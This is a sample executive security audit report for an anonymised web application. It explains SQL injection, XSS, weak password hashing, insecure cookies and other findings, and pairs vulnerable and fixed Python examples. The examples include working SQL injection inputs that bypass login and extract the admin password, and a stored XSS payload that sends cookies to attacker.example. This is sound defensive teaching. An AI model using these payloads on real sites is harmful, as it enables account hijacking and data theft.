SAS Data Services Ltd. Phone: +44(0)845-539-0027 Fax: +44(0)845-539-0026 Email: info@sasdataservices.com
Trafalgar House, 1 Grenville Place, London, NW73SA, UK
Website: http://www.sasdataservices.com Registered in England & Wales, Company No. 05514218
SAS Web Security

Securing The Perimeter



Brought To You By: SAS Web Security
http://www.saswebsecurity.com/

Version 1.0, Dated 9th June 2012

The following is a sample web application security report of the kind delivered after an audit. It raises several key flaws within
the application that need to be addressed.
This is an executive report intended for management. Its purpose is to explain the tests completed at a high level so that
management fully understand their security situation. A technical version of the report is also available on the
'Sample Report'
page for the technical staff; your technical team can use that report as a blueprint or guide to the issues they need to
repair. Please be sure to read the section entitled "What Now?" at the bottom of this report, as it advises you on the next
crucial steps.

Date: 9th June 2012
Company: *** Removed for Confidentiality ***
Site: *** Removed for Confidentiality ***
Requirement: Security Audit
Prepared By: Adam Palmer
Report: 1 of 1

The report below covers the following type of security audit: External Silver Web Audit; Executive Report

Priority Matrix

Priority        Count   Details
Critical        3       Compromise Highly Likely
High            4       Compromise Possible/Likely
Low             2       Security/System Considerations to be Noted
Informational   0       Security/Optimization Information


Testing Levels
Level 1
The system was audited and was found to contain one or more critical baseline flaws.
Level 2
The system was audited and was found to contain high priority flaws, but otherwise adheres to a security baseline.
Level 3
The system was audited and was not found to contain any basic medium, high or critical priority flaws. This is no
guarantee that none are present, simply that none were detected. The system has demonstrated a reasonable
level of security.
Level 4
The system was audited and was not found to contain any detectable security flaws. This is no guarantee that
none are present, simply that none were detected. The system has demonstrated a strong level of security.
Level 5
The system was audited and was not found to contain any detectable security flaws. This is no guarantee that
none are present, simply that none were detected. The system also takes a strong proactive and defensive
position with security. The system has demonstrated a very strong level of security.




Executive Summary
The web application *** Removed for Confidentiality *** was manually tested from the outside. A number of items were found,
ranging from low to critical problems. The results are listed in order of severity where possible, from high to low.
Three different categories of critical problem were detected. The problems we found gave us full access to the site's
database and allowed us to access other users' accounts. We could also have run malicious software within other users'
browsers. These problems were not highly complex to find and exploit, and an attacker would be able to exploit them with
ease. The application was tested and confirmed at LEVEL 1.
SQL Injection
An SQL injection attack is one in which an attacker is able to pass database commands through the web site directly to the
database. These commands could extract and view other users' passwords and account details, or modify or delete data. The
problem is that the web site does not keep what the user typed separate from the command it builds, and simply passes the
result straight to the database. This is obviously critical to any site that stores data. There are well-established steps that
programmers can take to prevent this in future (sending user input to the database as parameters rather than as part of the
command text). We have demonstrated this in the technical version of the report in more detail with sample data.
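The pattern behind this finding, as an added illustration rather than code from the audited site or from the technical report: a login check that splices form values into the SQL text, beside the parameterised version that fixes it. The table, the user records and the two attacker inputs are constructed for the example; Python's built-in sqlite3 stands in for whatever database the site uses.

```python
import sqlite3

# Constructed in-memory stand-in for the site's user table. Passwords are
# stored in clear here only to keep the injection visible; see the password
# handling finding for how they should actually be stored.
SAMPLE_USERS = [
    ("admin", "s3cret-admin-pw", 1),
    ("alice", "alice-pw", 0),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """The flawed pattern: form values are spliced into the SQL text, so a
    quote character in the input ends the literal and the rest of the input
    is run as SQL. Returns the matched username, or None."""
    sql = (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """The fix: a parameterised query. SQL text and values travel separately,
    so whatever the user typed is compared as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# Two constructed inputs of the kind an attacker submits in the username box.
BYPASS_INPUT = "admin' --"          # comments out the password check entirely
EXTRACT_INPUT = (                    # returns another column where the username should be
    "' UNION SELECT password FROM users WHERE username = 'admin' --"
)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass :", login_vulnerable(db, BYPASS_INPUT, "wrong"))
    print("vulnerable, extract:", login_vulnerable(db, EXTRACT_INPUT, "wrong"))
    print("safe, bypass       :", login_safe(db, BYPASS_INPUT, "wrong"))
    print("safe, real login   :", login_safe(db, "alice", "alice-pw"))
```

The second input is the one that matters to this report: with the vulnerable query it returns the administrator's password in the place where a username is expected, which is exactly the database access described above. Filtering quote characters out of input is not a substitute for parameters; it is easy to get wrong and is bypassed by other encodings.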
Cross Site Scripting (XSS)
During the audit, I asked you to check my profile with the excuse that it contained some kind of strange characters. At the point
that you visited that page, our XSS attack succeeded and passed your administrative session details to us, allowing us to gain
access to the administrator's control panel. This is again demonstrated in detail in the technical report.
There are two types of XSS to consider here: stored XSS, where the malicious content is saved in the site (for example in a
profile) and shown to everyone who views it, and reflected XSS, where it is carried in a specially crafted link and echoed back
to whoever follows the link. Both types of flaw were found in the application.
Similar to the SQL injection detailed above, this type of attack involves a malicious user being able to enter script rather
than just regular text, which the site then shows to other users unchanged. In this case, however, rather than a direct attack on
the server, it attacks other users, perhaps site administrators or other website users. In this sample case, it enabled an attacker
to browse the site as if he were logged in as the administrator without ever knowing the username and password. From there,
an attacker has full access to user information and data.
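How the stored and reflected cases above arise from the same mistake, and the one fix that covers both, as an added example that is not code from the audited application or the technical report. The profile payload, the search input and the attacker host name are constructed for the illustration; the fix is plain output encoding with Python's html module.

```python
import html
import re

# Constructed stored-XSS payload of the kind the report describes: saved into a
# profile field, it runs in the browser of whoever views the profile and sends
# that viewer's session cookie to a hypothetical attacker-controlled host.
STORED_PAYLOAD = (
    '<script>new Image().src="http://attacker.example/?c="'
    '+encodeURIComponent(document.cookie)</script>'
)

# Constructed reflected-XSS input: a search term the site echoes back into an
# attribute. The leading "> closes the attribute and the tag it sits in.
REFLECTED_INPUT = '"><img src=x onerror=alert(document.cookie)>'

LIVE_TAG = re.compile(r"<(script|img|iframe|svg)\b", re.IGNORECASE)


def render_profile_vulnerable(display_name):
    """Flawed: the stored value is pasted into the page as-is, so the browser
    parses the attacker's tags as part of the site's own markup."""
    return "<h1>Profile of %s</h1>" % display_name


def render_profile_safe(display_name):
    """Fix: encode the value for the HTML body context it lands in. The
    characters that start tags and attributes become entities the browser
    displays literally and never executes."""
    return "<h1>Profile of %s</h1>" % html.escape(display_name, quote=True)


def render_search_vulnerable(term):
    """Flawed reflected output: the term goes straight into an attribute."""
    return '<input name="q" value="%s">' % term


def render_search_safe(term):
    """Reflected output inside an attribute: encode with quote=True and keep
    the attribute quoted, otherwise a stray quote still breaks out."""
    return '<input name="q" value="%s">' % html.escape(term, quote=True)


def carries_markup(rendered):
    """Retest check: user data must not have produced a live tag in the page.
    Encoded output contains &lt;img, never <img, so it passes."""
    return LIVE_TAG.search(rendered) is not None


if __name__ == "__main__":
    for label, page in [
        ("stored, vulnerable", render_profile_vulnerable(STORED_PAYLOAD)),
        ("stored, fixed     ", render_profile_safe(STORED_PAYLOAD)),
        ("reflected, vuln   ", render_search_vulnerable(REFLECTED_INPUT)),
        ("reflected, fixed  ", render_search_safe(REFLECTED_INPUT)),
    ]:
        print(label, "| executes:", carries_markup(page), "|", page)
```

Encoding must be applied at the point of output for the context the data lands in (HTML body, attribute, JavaScript, URL), not once at input time; a value that is safe in one context is not safe in another. Marking the session cookie HttpOnly (see the cookie finding) limits what a successful injection can steal, but it does not remove the injection.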
Insecure Password Handling
The mechanism used to protect passwords in the database is relatively weak and should be made stronger. On its own this is not
as critical as some of the other detected flaws, but it certainly features high on the list because it combines easily with other
attacks: an attacker who extracts the password table through the SQL injection above can recover the original passwords.
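What "made stronger" means in practice, as an added example not taken from the audited site (the report does not say which mechanism the site uses, so the weak side below is a generic unsalted fast hash): a random per-user salt, a deliberately slow key derivation function, and constant-time comparison. PBKDF2-HMAC-SHA256 from Python's standard library is used because it needs no extra packages; bcrypt, scrypt or Argon2 are equally suitable. The 600,000 round figure is the one in the OWASP Password Storage Cheat Sheet and is a tunable example value.

```python
import base64
import hashlib
import hmac
import os

# Example cost setting (OWASP figure for PBKDF2-HMAC-SHA256); tune to your
# hardware so a verification takes a noticeable fraction of a second.
PBKDF2_ROUNDS = 600_000


def store_weak(password):
    """Flawed pattern: a fast, unsalted hash. Two users with the same password
    get the same value, and a lookup table or GPU cracker recovers common
    passwords from a stolen table in seconds."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def store_strong(password, rounds=PBKDF2_ROUNDS):
    """Fix: a random per-user salt and a deliberately slow key derivation
    function. The algorithm, round count and salt are kept with the hash so
    the cost can be raised later without breaking existing records."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return "pbkdf2_sha256$%d$%s$%s" % (
        rounds,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(dk).decode("ascii"),
    )


def verify_strong(password, stored):
    """Recompute with the stored parameters and compare in constant time."""
    try:
        algo, rounds, salt_b64, dk_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, int(rounds), len(expected)
    )
    return hmac.compare_digest(dk, expected)


def needs_rehash(stored, rounds=PBKDF2_ROUNDS):
    """True if a record predates the current cost setting or format; call it
    after a successful login and re-store the password with store_strong."""
    parts = stored.split("$")
    return len(parts) != 4 or parts[0] != "pbkdf2_sha256" or int(parts[1]) < rounds


if __name__ == "__main__":
    print("weak, same input twice :", store_weak("password1") == store_weak("password1"))
    h = store_strong("password1")
    print("strong record          :", h)
    print("strong, same input twice:", store_strong("password1") == h)
    print("verify right / wrong   :", verify_strong("password1", h), verify_strong("password2", h))
```

The rehash hook is what makes the scheme maintainable: existing records are upgraded transparently the next time each user logs in, so the cost can be raised as hardware improves without forcing a password reset.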

Insecure Cookies
Cookies are passed about throughout the site without encryption. Those cookies that are set during an encrypted (HTTPS) part of
the site are not marked as HTTPS-only, so the browser will send them back later over plain HTTP, where they can be read by
anyone on the network path.

This renders the SSL/HTTPS obsolete to a degree and potentially allows user accounts to be hijacked. It potentially does more
harm than good by allowing users to believe that their session is encrypted and safe when it can easily be hijacked.
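The flag that is missing here and the retest for it, as an added example not drawn from the audited site's responses: a login handler should set the session cookie with Secure (HTTPS only) and HttpOnly (not readable by page script, which closes the cookie-theft route used in the XSS finding); SameSite is current practice as well. The cookie name, value and sample response headers below are constructed.

```python
# Constructed Set-Cookie values as they would appear in captured responses.
# The first is the weak form the report describes: no Secure flag, so the
# browser also attaches the cookie to plain-HTTP requests to the same host.
INSECURE_EXAMPLE = "sessionid=7f3a9c; Path=/"
HARDENED_EXAMPLE = "sessionid=7f3a9c; Path=/; Secure; HttpOnly; SameSite=Lax"


def session_cookie_header(session_id, name="sessionid", samesite="Lax"):
    """Build the Set-Cookie value a login handler should emit. Secure: sent
    only over HTTPS. HttpOnly: hidden from page script. SameSite: not
    attached to requests started from other sites."""
    parts = ["%s=%s" % (name, session_id), "Path=/", "Secure", "HttpOnly"]
    if samesite:
        parts.append("SameSite=%s" % samesite)
    return "; ".join(parts)


def audit_set_cookie(header_value):
    """Return the weaknesses in one Set-Cookie value; run it over every
    Set-Cookie header in a captured HTTPS response to retest this finding."""
    pieces = [p.strip() for p in header_value.split(";") if p.strip()]
    name = pieces[0].split("=", 1)[0]
    attrs = {}
    for piece in pieces[1:]:
        key, _, value = piece.partition("=")
        attrs[key.strip().lower()] = value.strip() if value else True
    problems = []
    if "secure" not in attrs:
        problems.append("%s: missing Secure, also sent over plain HTTP" % name)
    if "httponly" not in attrs:
        problems.append("%s: missing HttpOnly, readable by injected script" % name)
    if "samesite" not in attrs:
        problems.append("%s: missing SameSite, attached to cross-site requests" % name)
    return problems


def audit_response_headers(raw_headers):
    """Apply the check to a block of raw response headers."""
    findings = []
    for line in raw_headers.splitlines():
        if line.lower().startswith("set-cookie:"):
            findings.extend(audit_set_cookie(line.split(":", 1)[1]))
    return findings


# Constructed response: one weak session cookie and one correctly flagged cookie.
SAMPLE_RESPONSE_HEADERS = """HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionid=7f3a9c; Path=/
Set-Cookie: remember=1; Path=/; Secure; HttpOnly; SameSite=Lax
"""

if __name__ == "__main__":
    print("login handler should send:", session_cookie_header("7f3a9c"))
    for finding in audit_response_headers(SAMPLE_RESPONSE_HEADERS):
        print("finding:", finding)
```

The Secure flag only helps if the whole authenticated part of the site is served over HTTPS; a single plain-HTTP page that the browser visits while logged in is enough for a cookie without the flag to leak.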



Auto Complete Password Field
The password field at *** Removed for confidentiality *** was found to have autocomplete enabled, which is a security risk as
the password is stored within the user's browser. When a user visits the site and saves his login details through autocomplete,
other users of that same PC can access his account. (Note that current browsers generally ignore autocomplete="off" on
password fields and manage saved credentials themselves; the attribute should still be set, but it cannot be relied on alone.)
Insecure POST
Data is posted from *** Removed for confidentiality *** to *** Removed for confidentiality *** unencrypted. Whilst on the site,
data that I enter into a form is sent to a third-party site. This is intentional behaviour; however, it is sent unencrypted (over
plain HTTP rather than HTTPS) and can therefore be intercepted.
PHP Source Code Disclosure
A minor code disclosure was located in /js/global.js, which contains commented-out server code. Whilst this instance does not
disclose any significant code, it illustrates an important point: a file served to the browser is visible to anyone who cares to look,
so server code that has been "commented out" in such a file is still published, and could give away all kinds of confidential or
proprietary information.
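A check the development team can run over the site's static assets before each release, as an added example (not the site's actual /js/global.js, whose contents are not reproduced in this report): it flags lines in browser-served files that carry server-side fragments, commented or not. The sample file content and the pattern list are constructed; extend the pattern to whatever server technology is in use.

```python
import re

# Server-side fragments that should never reach a browser-served asset:
# PHP open tags, PHP superglobals and the ASP/JSP <% delimiter. The <% entry
# can false-positive on JavaScript modulo expressions; review hits by hand.
SERVER_CODE = re.compile(r"<\?(?:php\b|=)|<%|\$_(?:GET|POST|SERVER|SESSION|COOKIE)\b")

# Constructed stand-in for a global.js: a developer "hid" a server snippet by
# commenting it out, but a .js file is served verbatim, comments included.
SAMPLE_GLOBAL_JS = """\
function initMenu() { /* menu wiring omitted */ }
// old version, disabled:
// <?php $token = $_SESSION['admin_token']; echo "var adminToken = '$token';"; ?>
var apiBase = "/api/";
"""


def find_server_code(js_source):
    """Return (line_number, text) for every line carrying server-side code.
    Commented lines are checked too: a comment hides nothing from a user
    who views the source."""
    return [
        (n, line.strip())
        for n, line in enumerate(js_source.splitlines(), 1)
        if SERVER_CODE.search(line)
    ]


def scan_files(named_sources):
    """Run the check over a mapping of path -> file text and return
    (path, line_number, text) triples for reporting."""
    return [
        (path, n, text)
        for path, source in named_sources.items()
        for n, text in find_server_code(source)
    ]


if __name__ == "__main__":
    for path, n, text in scan_files({"/js/global.js": SAMPLE_GLOBAL_JS}):
        print("%s:%d: %s" % (path, n, text))
```

On a real tree the same check is one line at the shell (`grep -rn '<?php' public/`); the point of wiring it into the build is that it runs every time, not only when someone remembers.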

Other Tests Performed and Items Noted
We also scanned for sensitive development files that may have been left behind by the developers, but found none under any of
the common names checked.
Summary
The audit has identified a number of priority action points in the application, which I recommend the development team
address as a high priority, as soon as possible. The general standard of security within the application is unfortunately quite
low. Items located ranged in severity from high to low. The level of breach obtained within the audit by no means represents
the total level of breach possible. The scope was to test the *** Removed for confidentiality *** web application alone. On that
basis, it may well have been possible to attack the various other systems and servers that you are running, and to escalate
our attacks further than we did. Deeper and more destructive attacks, such as attempting to delete or modify data or
attempting to upload malicious binaries to the server, were also not performed.
In light of the level of exploitation possible, I recommend that you consider on-going auditing, a more in-depth audit
potentially covering code, and a full audit of the other servers related to the enterprise.
This audit is not a guarantee, warranty or certification of a certain level of security. The audit is not guaranteed to have found
and covered all bugs, holes or breaches, and frequent audits and testing are always recommended. All audits are conducted in
line with our TOS, available at
http://www.saswebsecurity.com/terms/

What Now?

Once you've had a chance to digest the report, please get in touch to discuss the implications and what this means for you. We
can then formulate a plan together to ensure that these and future issues are addressed.

The most important thing you can do now is take swift action to correct these flaws and protect your digital assets. While you
may or may not understand every aspect of this report, the essential point you need to take from it is that
vulnerabilities were found and your digital assets are at high risk of being compromised. Preventing malicious attacks is far
more cost effective than the work needed to clean up and repair after an attack has occurred. We are available to support
and assist you and/or your development staff, whether that be in assisting and advising on repair work, or in retesting once
repair work is complete.
If you don't have IT staff capable of handling these corrections in a very timely manner, please contact me for a quote for SAS
Web Security to implement the fixes.